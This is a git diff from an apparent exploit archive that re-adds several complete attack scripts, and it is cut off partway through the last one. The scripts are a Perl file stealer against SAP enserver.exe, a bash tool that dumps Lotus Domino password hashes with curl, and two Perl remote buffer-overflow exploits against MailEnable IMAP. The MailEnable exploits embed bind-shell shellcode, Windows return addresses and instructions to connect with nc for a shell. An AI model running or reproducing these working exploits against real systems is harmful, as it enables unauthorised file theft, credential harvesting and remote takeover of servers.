+#!/usr/bin/perl -w
+
+##
+## SAP 'enserver.exe' file downloader
+## Tested on "SAP Web Application Server Java 6.40" (eval DVD)
+## Found & coded by Nicob
+##
+## The downloaded file is limited to the first 32 kilobytes
+## Usual port : TCP/3200+SYSNR
+## Exemple : ./r3-stealer-1.0.pl 192.168.2.22 3201 "c:\\boot.ini"
+##
+## From MSDN (Win2K pre-SP4, WinXP pre-SP2 and WinNT) :
+## "\\\\your_box\\pipe\\your_pipe" => get Local Admin (SAPServiceJ2E)
+## http://msdn.microsoft.com/library/default.asp?url=/library/en-us/secauthz/security/authorization_constants.asp
+##
+## File parameter :
+##	C:\boot.ini
+## 	\\10.11.12.13\share\image.jpg
+##	..\..\..\..\..\..\Documents and Settings\All Users\Application Data\sapdb\wa\httpreq.log (contains passwords !)
+##
+
+# Init
+
+use strict;
+use IO::Socket;
+
+my $verbose = 0;
+# Set this to anything not null to crash the process
+my $crash = "";
+
+my $socket;
+my $reply;
+
+$|=1;
+
+# Get arguments
+
+if (($#ARGV<2) or ($ARGV[0] eq "-h")) {die "Usage: $0    ()\n";}
+my $host=$ARGV[0]; 
+my $port=$ARGV[1]; 
+my $filename=$ARGV[2]; 
+my $output=$ARGV[3]; 
+
+# Calculate variables
+
+my $lg = length($filename);
+my $tag1 = sprintf('%x', 0x4F + $lg);
+my $tag2 = sprintf('%x', 0x20 + $lg);
+
+# Show banner
+
+print "#####################################################################\n";
+print "### SAP 'enserver.exe' file downloader\n";
+print "### Downloading '$filename' from '$host'\n";
+print "#####################################################################\n\n";
+
+# Define the packets
+
+my $packet1 =
+	"0000005dabcde123000000000000005d0000005d06010000000000060000000000040000000000010004000000000003".	# Static
+	"5f6e69636f625f6e69636f625f6e69636f62315f".								# ASCII string : "_nicob_nicob_nicob1_" 
+	"00000000020000003b0000000500000002000000060000000400000001";						# Static
+
+my $packet2 =
+	"000000". $tag1. "abcde12300000001000000". $tag1 ."000000". $tag1 .
+	"03000000454e430001010000234541410100000013030000000000234541450001000000". $tag2 .
+	"0000000000007d00000000000000000000000000". unpack("H*",$filename) . $crash ."000023454144";		# Crash if bad filename length
+
+# Create the socket
+
+$socket = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$host,PeerPort => $port)
+		|| die "Connection refused at [$host:$port]";
+
+# Send the two packet
+
+print $socket pack("H*",$packet1);
+print $socket pack("H*",$packet2);
+
+sleep 2;
+
+# Read and display response
+
+recv($socket,$reply,150000,MSG_PEEK);
+if ($reply =~ /^(.*)#EAD(.*)$/s) {
+	print "File received !\n";
+	if ((!defined($output)) or ($output eq "")) {
+		print "\n===========================================\n";
+		print $2;
+		print "\n===========================================\n";
+	} else {
+		open(OUT, "> $output") || die "Can't open $output ($0)";
+		print "File saved as '$output'\n";
+		print OUT $2;
+		close(OUT);
+	}
+} else {
+	print "Problem interpreting reply :-(\n";
+}
+
+# Close the socket
+
+print "\nThe end ...\n";
+close $socket;
+
+# milw0rm.com [2007-02-08]
diff --git a/platforms/windows/remote/3302.sh b/platforms/windows/remote/3302.sh
index 55230a035..b8d0d19ca 100755
--- a/platforms/windows/remote/3302.sh
+++ b/platforms/windows/remote/3302.sh
@@ -1,139 +1,139 @@
-#!/bin/bash
-
-#
-# $Id: raptor_dominohash,v 1.3 2007/02/13 17:27:28 raptor Exp $
-#
-# raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump
-# Copyright (c) 2007 Marco Ivaldi 
-#
-# Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, 
-# stores sensitive data from names.nsf in hidden form fields, which allows 
-# remote attackers to read the HTML source to obtain sensitive information such 
-# as (1) the password hash in the HTTPPassword field, (2) the password change 
-# date in the HTTPPasswordChangeDate field, (3) the client platform in the 
-# ClntPltfrm field, (4) the client machine name in the ClntMachine field, and 
-# (5) the client Lotus Domino release in the ClntBld field, a different 
-# vulnerability than CVE-2005-2696 (CVE-2005-2428).
-#
-# According to testing, it's possible to dump all HTTPPassword hashes using the 
-# $defaultview view instead of $users. This saves a considerable amount of time.
-# 
-# The code may require some changes to properly work with your configuration.
-#
-# See also:
-# http://www.securiteinfo.com/outils/DominoHashBreaker.shtml
-#
-# Usage:
-# $ ./raptor_dominohash 192.168.0.202
-# [...]
-# Extracting the view entries...
-# Done! 656 unique entries have been found.
-# Now ready to dump password hashes...
-# [...]
-# [http://192.168.0.202/names.nsf/$defaultview/00DA2289CC118A854925715A000611A3]
-# FirstName:      Foo
-# LastName:       Bar
-# ShortName:      fbar
-# HTTPPassword:   (355E98E7C7B59BD810ED845AD0FD2FC4)
-# [...]
-#
-# Vulnerable platforms:
-# Lotus Domino R6 Webmail [tested]
-# Lotus Domino R5 Webmail [untested]
-# Lotus Domino R4 Webmail? [untested]
-#
-
-# Some vars
-i=1
-tmp1=dominohash1.tmp
-tmp2=dominohash2.tmp
-
-# Command line
-host=$1
-
-# Local fuctions
-function header() {
-	echo ""
-	echo "raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump"
-	echo "Copyright (c) 2007 Marco Ivaldi "
-	echo ""
-}
-
-function footer() {
-	echo ""
-	exit 0
-}
-
-function usage() {
-	header
-	echo "usage  : ./raptor_dominohash "
-	echo "example: ./raptor_dominohash 192.168.0.202"
-	footer
-}
-
-function notfound() {
-	header
-	echo "error  : curl not found"
-	footer
-}
-
-# Check if curl is there
-curl=`which curl 2>/dev/null`
-if [ $? -ne 0 ]; then
-	notfound
-fi
-
-# Input control
-if [ -z "$1"  ]; then
-	usage
-fi
-
-# Remove temporary files
-rm -f $tmp1
-rm -f $tmp2
-
-header
-
-# Extract the view entries
-echo "Extracting the view entries..."
-while :
-do
-	curl "http://${host}/names.nsf/\$defaultview?Readviewentries&Start=${i}" 2>/dev/null | grep unid >> $tmp1
-
-	# Check grep return value
-	if [ $? -ne 0 ]; then
-		break
-	fi
-
-	# Go for the next page
-	i=`expr $i + 30`
-	echo -ne "\b\b\b\b\b\b\b\b$i"
-done
-
-cat $tmp1 | awk -F'unid="' '{print $2}' | awk -F'"' '{print $1}' | sort | uniq > $tmp2
-
-# Check if some view entries have been found
-if [ ! -s $tmp2 ]; then
-	echo "No entries found on host ${host}!"
-	footer
-fi
-echo -ne "\b\b\b\b\b\b\b\bDone! "
-echo "`wc -l ${tmp2} | awk '{print $1}'` unique entries have been found."
-echo ""
-
-# Perform the hash dumping
-echo "Now ready to dump password hashes..."
-echo ""
-sleep 4
-for unid in `cat $tmp2`
-do
-	echo "[http://${host}/names.nsf/\$defaultview/${unid}]"
-	echo ""
-	#curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 2>/dev/null | egrep '"FullName"|"HTTPPassword"'
-	curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 2>/dev/null | egrep '"FirstName"|"LastName"|"ShortName"|"HTTPPassword"' | awk -F'input name="' '{print $2}' | awk -F'" type="hidden" value="' '{print $1 ":\t" $2}' | tr -d '">'
-	echo ""
-done
-
-footer
-
-# milw0rm.com [2007-02-13]
+#!/bin/bash
+
+#
+# $Id: raptor_dominohash,v 1.3 2007/02/13 17:27:28 raptor Exp $
+#
+# raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump
+# Copyright (c) 2007 Marco Ivaldi 
+#
+# Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, 
+# stores sensitive data from names.nsf in hidden form fields, which allows 
+# remote attackers to read the HTML source to obtain sensitive information such 
+# as (1) the password hash in the HTTPPassword field, (2) the password change 
+# date in the HTTPPasswordChangeDate field, (3) the client platform in the 
+# ClntPltfrm field, (4) the client machine name in the ClntMachine field, and 
+# (5) the client Lotus Domino release in the ClntBld field, a different 
+# vulnerability than CVE-2005-2696 (CVE-2005-2428).
+#
+# According to testing, it's possible to dump all HTTPPassword hashes using the 
+# $defaultview view instead of $users. This saves a considerable amount of time.
+# 
+# The code may require some changes to properly work with your configuration.
+#
+# See also:
+# http://www.securiteinfo.com/outils/DominoHashBreaker.shtml
+#
+# Usage:
+# $ ./raptor_dominohash 192.168.0.202
+# [...]
+# Extracting the view entries...
+# Done! 656 unique entries have been found.
+# Now ready to dump password hashes...
+# [...]
+# [http://192.168.0.202/names.nsf/$defaultview/00DA2289CC118A854925715A000611A3]
+# FirstName:      Foo
+# LastName:       Bar
+# ShortName:      fbar
+# HTTPPassword:   (355E98E7C7B59BD810ED845AD0FD2FC4)
+# [...]
+#
+# Vulnerable platforms:
+# Lotus Domino R6 Webmail [tested]
+# Lotus Domino R5 Webmail [untested]
+# Lotus Domino R4 Webmail? [untested]
+#
+
+# Some vars
+i=1
+tmp1=dominohash1.tmp
+tmp2=dominohash2.tmp
+
+# Command line
+host=$1
+
+# Local fuctions
+function header() {
+	echo ""
+	echo "raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump"
+	echo "Copyright (c) 2007 Marco Ivaldi "
+	echo ""
+}
+
+function footer() {
+	echo ""
+	exit 0
+}
+
+function usage() {
+	header
+	echo "usage  : ./raptor_dominohash "
+	echo "example: ./raptor_dominohash 192.168.0.202"
+	footer
+}
+
+function notfound() {
+	header
+	echo "error  : curl not found"
+	footer
+}
+
+# Check if curl is there
+curl=`which curl 2>/dev/null`
+if [ $? -ne 0 ]; then
+	notfound
+fi
+
+# Input control
+if [ -z "$1"  ]; then
+	usage
+fi
+
+# Remove temporary files
+rm -f $tmp1
+rm -f $tmp2
+
+header
+
+# Extract the view entries
+echo "Extracting the view entries..."
+while :
+do
+	curl "http://${host}/names.nsf/\$defaultview?Readviewentries&Start=${i}" 2>/dev/null | grep unid >> $tmp1
+
+	# Check grep return value
+	if [ $? -ne 0 ]; then
+		break
+	fi
+
+	# Go for the next page
+	i=`expr $i + 30`
+	echo -ne "\b\b\b\b\b\b\b\b$i"
+done
+
+cat $tmp1 | awk -F'unid="' '{print $2}' | awk -F'"' '{print $1}' | sort | uniq > $tmp2
+
+# Check if some view entries have been found
+if [ ! -s $tmp2 ]; then
+	echo "No entries found on host ${host}!"
+	footer
+fi
+echo -ne "\b\b\b\b\b\b\b\bDone! "
+echo "`wc -l ${tmp2} | awk '{print $1}'` unique entries have been found."
+echo ""
+
+# Perform the hash dumping
+echo "Now ready to dump password hashes..."
+echo ""
+sleep 4
+for unid in `cat $tmp2`
+do
+	echo "[http://${host}/names.nsf/\$defaultview/${unid}]"
+	echo ""
+	#curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 2>/dev/null | egrep '"FullName"|"HTTPPassword"'
+	curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 2>/dev/null | egrep '"FirstName"|"LastName"|"ShortName"|"HTTPPassword"' | awk -F'input name="' '{print $2}' | awk -F'" type="hidden" value="' '{print $1 ":\t" $2}' | tr -d '">'
+	echo ""
+done
+
+footer
+
+# milw0rm.com [2007-02-13]
diff --git a/platforms/windows/remote/3319.pl b/platforms/windows/remote/3319.pl
index d391fa92b..84c291014 100755
--- a/platforms/windows/remote/3319.pl
+++ b/platforms/windows/remote/3319.pl
@@ -1,132 +1,132 @@
-#!/usr/bin/perl
-#
-# maildisable-v3.pl
-#
-# Mail Enable Professional/Enterprise v2.32-4 (win32) remote exploit
-# by mu-b - Thu Nov 23 2006
-#
-# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
-#              Mail Enable Professional v2.33 (win32)
-#              Mail Enable Professional v2.34 (win32)
-#
-# what does this remind you off?
-# Note: timing is quite critical with this!!, so change $send_delay
-#       if it doesn't work....
-#
-########
-
-use Getopt::Std; getopts('t:n:', \%arg);
-use Socket;
-
-# metasploit win32 bindshell port 1337
-my $zshell_win32_bind =
-  "\x33\xc9\x83\xe9\xb0".
-  "\x81\xc4\xd0\xfd\xff\xff".
-  "\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d".
-  "\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96".
-  "\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2".
-  "\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0".
-  "\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41".
-  "\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82".
-  "\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2".
-  "\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39".
-  "\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9".
-  "\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b".
-  "\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a".
-  "\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88".
-  "\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01".
-  "\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20".
-  "\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e".
-  "\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39".
-  "\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44".
-  "\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96".
-  "\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38".
-  "\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9".
-  "\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09".
-  "\x4e\x33\xe4\x96\xcd\xcc\x32\x69";
-
-# ff e4 -> jmp %esp
-my @offsets = ( "\xf8\xfe\x5a\x7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
-                "\xe2\x48\xe6\x77", # WinXP SP0 KERNEL32.dll 5.1.2600.0
-                "\x06\x38\xe6\x77", # WinXP SP1 KERNEL32.dll 5.1.2600.11061
-                "\xd9\xae\x80\x7c", # WinXP SP2 KERNEL32.dll 5.1.2600.21802
-                "\x62\x51\xeb\x77", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
-                "\xef\xbe\xad\xde"  # DoS
-              );
-
-&print_header;
-
-my $target;
-my $offset;
-
-if (defined($arg{'t'})) { $target = $arg{'t'} }
-if (defined($arg{'n'})) { $offset = $arg{'n'} }
-if (!(defined($target))) { &usage; }
-if (!(defined($offset))) { $offset = 0; }
-if ($offset > $#offsets) {
-    print("only ".($#offsets+1)." targets known!!\n");
-    exit(1);
-} else {
-    $offset = $offsets[$offset];
-}
-
-my $imapd_port = 143;
-my $send_delay = 2;
-
-my $NOP = 'A';
-my $START_PAD = 3;
-
-if (connect_host($target, $imapd_port)) {
-    print("-> * Connected\n");
-    send(SOCKET, "1 LOGIN {1022}\r\n", 0);
-    sleep(2);
-
-    print("-> * Sending padding payload\n");
-    # first recv < 0x3fe, NULL tricks strncpy...
-    send(SOCKET, "\x00".($NOP x 1020), 0);
-    sleep($send_delay);
-
-    print("-> * Sending payload\n");
-    $buf = ($NOP x $START_PAD).# padding
-           "\xee\xaf\xdc\xba". # dummy var_0
-           "\xef\xbe\xad\xde". # EBP
-           $offset.            # EIP
-           "\xdc\xa3\x19\x03". # dummy arg_0 "\xdc\xa3\x19\x03" v2.33
-           ($NOP x 4).         # NOPS
-           $zshell_win32_bind. # hellcode
-           $NOP x (0x3fd-$START_PAD-16-length($zshell_win32_bind)-5);
-
-    send(SOCKET, $buf, 0);
-    sleep($send_delay);
-
-    print("-> * Successfully sent payload!\n");
-    print("-> * nc ".$target." 1337 for shell...\n");
-}
-
-sub print_header {
-    print("MailEnable Pro v2.32-4 (HOTFIX) remote exploit\n");
-    print("by: \n\n");
-}
-
-sub usage {
-  print(qq(Usage: $0 -t 
-
-     -t     : hostname to test
-     -n          : return addy offset number
-));
-
-    exit(1);
-}
-
-sub connect_host {
-    ($target, $port) = @_;
-    $iaddr  = inet_aton($target)                 || die("Error: $!\n");
-    $paddr  = sockaddr_in($port, $iaddr)         || die("Error: $!\n");
-    $proto  = getprotobyname('tcp')              || die("Error: $!\n");
-
-    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
-    connect(SOCKET, $paddr)                      || die("Error: $!\n");
-    return(1338);
-}
-
-# milw0rm.com [2007-02-16]
+#!/usr/bin/perl
+#
+# maildisable-v3.pl
+#
+# Mail Enable Professional/Enterprise v2.32-4 (win32) remote exploit
+# by mu-b - Thu Nov 23 2006
+#
+# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
+#              Mail Enable Professional v2.33 (win32)
+#              Mail Enable Professional v2.34 (win32)
+#
+# what does this remind you off?
+# Note: timing is quite critical with this!!, so change $send_delay
+#       if it doesn't work....
+#
+########
+
+use Getopt::Std; getopts('t:n:', \%arg);
+use Socket;
+
+# metasploit win32 bindshell port 1337
+my $zshell_win32_bind =
+  "\x33\xc9\x83\xe9\xb0".
+  "\x81\xc4\xd0\xfd\xff\xff".
+  "\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d".
+  "\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96".
+  "\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2".
+  "\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0".
+  "\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41".
+  "\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82".
+  "\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2".
+  "\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39".
+  "\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9".
+  "\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b".
+  "\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a".
+  "\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88".
+  "\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01".
+  "\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20".
+  "\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e".
+  "\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39".
+  "\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44".
+  "\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96".
+  "\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38".
+  "\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9".
+  "\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09".
+  "\x4e\x33\xe4\x96\xcd\xcc\x32\x69";
+
+# ff e4 -> jmp %esp
+my @offsets = ( "\xf8\xfe\x5a\x7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
+                "\xe2\x48\xe6\x77", # WinXP SP0 KERNEL32.dll 5.1.2600.0
+                "\x06\x38\xe6\x77", # WinXP SP1 KERNEL32.dll 5.1.2600.11061
+                "\xd9\xae\x80\x7c", # WinXP SP2 KERNEL32.dll 5.1.2600.21802
+                "\x62\x51\xeb\x77", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
+                "\xef\xbe\xad\xde"  # DoS
+              );
+
+&print_header;
+
+my $target;
+my $offset;
+
+if (defined($arg{'t'})) { $target = $arg{'t'} }
+if (defined($arg{'n'})) { $offset = $arg{'n'} }
+if (!(defined($target))) { &usage; }
+if (!(defined($offset))) { $offset = 0; }
+if ($offset > $#offsets) {
+    print("only ".($#offsets+1)." targets known!!\n");
+    exit(1);
+} else {
+    $offset = $offsets[$offset];
+}
+
+my $imapd_port = 143;
+my $send_delay = 2;
+
+my $NOP = 'A';
+my $START_PAD = 3;
+
+if (connect_host($target, $imapd_port)) {
+    print("-> * Connected\n");
+    send(SOCKET, "1 LOGIN {1022}\r\n", 0);
+    sleep(2);
+
+    print("-> * Sending padding payload\n");
+    # first recv < 0x3fe, NULL tricks strncpy...
+    send(SOCKET, "\x00".($NOP x 1020), 0);
+    sleep($send_delay);
+
+    print("-> * Sending payload\n");
+    $buf = ($NOP x $START_PAD).# padding
+           "\xee\xaf\xdc\xba". # dummy var_0
+           "\xef\xbe\xad\xde". # EBP
+           $offset.            # EIP
+           "\xdc\xa3\x19\x03". # dummy arg_0 "\xdc\xa3\x19\x03" v2.33
+           ($NOP x 4).         # NOPS
+           $zshell_win32_bind. # hellcode
+           $NOP x (0x3fd-$START_PAD-16-length($zshell_win32_bind)-5);
+
+    send(SOCKET, $buf, 0);
+    sleep($send_delay);
+
+    print("-> * Successfully sent payload!\n");
+    print("-> * nc ".$target." 1337 for shell...\n");
+}
+
+sub print_header {
+    print("MailEnable Pro v2.32-4 (HOTFIX) remote exploit\n");
+    print("by: \n\n");
+}
+
+sub usage {
+  print(qq(Usage: $0 -t 
+
+     -t     : hostname to test
+     -n          : return addy offset number
+));
+
+    exit(1);
+}
+
+sub connect_host {
+    ($target, $port) = @_;
+    $iaddr  = inet_aton($target)                 || die("Error: $!\n");
+    $paddr  = sockaddr_in($port, $iaddr)         || die("Error: $!\n");
+    $proto  = getprotobyname('tcp')              || die("Error: $!\n");
+
+    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
+    connect(SOCKET, $paddr)                      || die("Error: $!\n");
+    return(1338);
+}
+
+# milw0rm.com [2007-02-16]
diff --git a/platforms/windows/remote/3320.pl b/platforms/windows/remote/3320.pl
index 1af59244f..1ae4fe319 100755
--- a/platforms/windows/remote/3320.pl
+++ b/platforms/windows/remote/3320.pl
@@ -1,128 +1,128 @@
-#!/usr/bin/perl
-#
-# maildisable-v6.pl
-#
-# Mail Enable Professional <=v2.35 (win32) remote exploit
-# by mu-b - Tue Dec 5 2006
-#
-# - Tested on: Mail Enable Professional v2.35 (win32)
-#
-# Note: timing is quite critical with this!!, so change $send_delay
-#       if it doesn't work....
-#
-########
-
-use Getopt::Std; getopts('t:n:', \%arg);
-use Socket;
-
-# metasploit win32 bindshell port 1337
-my $zshell_win32_bind =
-  "\x33\xc9\x83\xe9\xb0".
-  "\x81\xc4\xd0\xfd\xff\xff".
-  "\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d".
-  "\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96".
-  "\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2".
-  "\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0".
-  "\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41".
-  "\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82".
-  "\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2".
-  "\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39".
-  "\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9".
-  "\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b".
-  "\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a".
-  "\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88".
-  "\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01".
-  "\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20".
-  "\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e".
-  "\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39".
-  "\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44".
-  "\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96".
-  "\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38".
-  "\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9".
-  "\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09".
-  "\x4e\x33\xe4\x96\xcd\xcc\x32\x69";
-
-# ff e4 -> jmp %esp
-my @offsets = ( "\xf8\xfe\x5a\x7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
-                "\xe2\x48\xe6\x77", # WinXP SP0 KERNEL32.dll 5.1.2600.0
-                "\x06\x38\xe6\x77", # WinXP SP1 KERNEL32.dll 5.1.2600.11061
-                "\xd9\xae\x80\x7c", # WinXP SP2 KERNEL32.dll 5.1.2600.21802
-                "\x62\x51\xeb\x77", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
-                "\xef\xbe\xad\xde"  # DoS
-              );
-
-&print_header;
-
-my $target;
-my $offset;
-
-if (defined($arg{'t'})) { $target = $arg{'t'} }
-if (defined($arg{'n'})) { $offset = $arg{'n'} }
-if (!(defined($target))) { &usage; }
-if (!(defined($offset))) { $offset = 0; }
-if ($offset > $#offsets) {
-    print("only ".($#offsets+1)." targets known!!\n");
-    exit(1);
-} else {
-    $offset = $offsets[$offset];
-}
-
-my $imapd_port = 143;
-my $send_delay = 1;
-
-my $NOP = 'A';
-my $START_PAD = 547;
-my $SHELL_PAD = 12;
-
-if (connect_host($target, $imapd_port)) {
-    print("-> * Connected\n");
-    $buf = "A001 LOGIN \{24\}";
-    send(SOCKET, $buf."\r\n", 0);
-    sleep($send_delay);
-
-    print("-> * Sending payload\n");
-
-    send(SOCKET, "AAAAAAAAAAAAAAAAA\{20\}\r\n", 0);
-    sleep($send_delay);
-
-    send(SOCKET, "BBBBBBBBBBBBBBBBBB\r\n", 0);
-    sleep($send_delay);
-
-    $buf = ($NOP x $START_PAD).# padding
-           $offset.            # EIP
-           ($NOP x $SHELL_PAD).
-           $zshell_win32_bind. # hellcode
-           ($NOP x (0x3ff-$START_PAD-$SHELL_PAD-4-length($zshell_win32_bind)));
-    send(SOCKET, $buf, 0);
-
-    print("-> * Successfully sent payload!\n");
-    print("-> * nc ".$target." 1337 for shell...\n");
-}
-
-sub print_header {
-    print("MailEnable Pro <=v2.35 remote exploit\n");
-    print("by: \n\n");
-}
-
-sub usage {
-  print(qq(Usage: $0 -t 
-
-     -t     : hostname to test
-     -n          : return addy offset number
-));
-
-    exit(1);
-}
-
-sub connect_host {
-    ($target, $port) = @_;
-    $iaddr  = inet_aton($target)                 || die("Error: $!\n");
-    $paddr  = sockaddr_in($port, $iaddr)         || die("Error: $!\n");
-    $proto  = getprotobyname('tcp')              || die("Error: $!\n");
-
-    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
-    connect(SOCKET, $paddr)                      || die("Error: $!\n");
-    return(1338);
-}
-
-# milw0rm.com [2007-02-16]
+#!/usr/bin/perl
+#
+# maildisable-v6.pl
+#
+# Mail Enable Professional <=v2.35 (win32) remote exploit
+# by mu-b - Tue Dec 5 2006
+#
+# - Tested on: Mail Enable Professional v2.35 (win32)
+#
+# Note: timing is quite critical with this!!, so change $send_delay
+#       if it doesn't work....
+#
+########
+
+use Getopt::Std; getopts('t:n:', \%arg);
+use Socket;
+
+# metasploit win32 bindshell port 1337
+my $zshell_win32_bind =
+  "\x33\xc9\x83\xe9\xb0".
+  "\x81\xc4\xd0\xfd\xff\xff".
+  "\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d".
